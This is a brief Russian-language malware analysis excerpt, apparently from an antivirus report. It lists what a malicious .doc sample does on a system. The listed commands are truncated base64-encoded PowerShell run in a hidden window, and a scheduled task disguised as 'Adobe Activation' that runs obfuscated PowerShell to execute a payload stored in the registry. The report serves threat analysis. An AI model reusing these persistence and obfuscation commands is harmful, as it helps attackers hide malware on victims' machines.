Техническая информация
- <SYSTEM32>\tasks\adobe activation
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AG4AIAA9ACAAIgBBAGQAbwBiAGUAIABBAGMAdABpAHYAYQB0AGkAbwBuACIAOwANAAoAJAB0AHIAIAA9ACAAIgBDADoAXABXAEkAbgBkAE8AdwBzAFwAcwBZAFMAVABlAE0AMwAyAFwAYwBNAGQALgBlAHgARQAgAC8AYwAgAHAAXgBPAHcARQByAF...
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AG4AIAA9ACAAIgBBAGQAbwBiAGUAIABBAGMAdABpAHYAYQB0AGkAbwBuACIAOwANAAoAJAB0AHIAIAA9ACAAIgBDADoAXABXAEkAbgBkAE8AdwBzAFwAcwBZAFMAVABlAE0AMwAyAFwAYwBNAGQALgBlAHgARQAgAC8AYwAgAHAAXgBPAHcARQByAF...' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /tn "Adobe Activation" /tr "<SYSTEM32>\cMd.exE /c p^OwEr^S^hE^l^l^.^exE -NonI -W hidden -c 'IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Micros...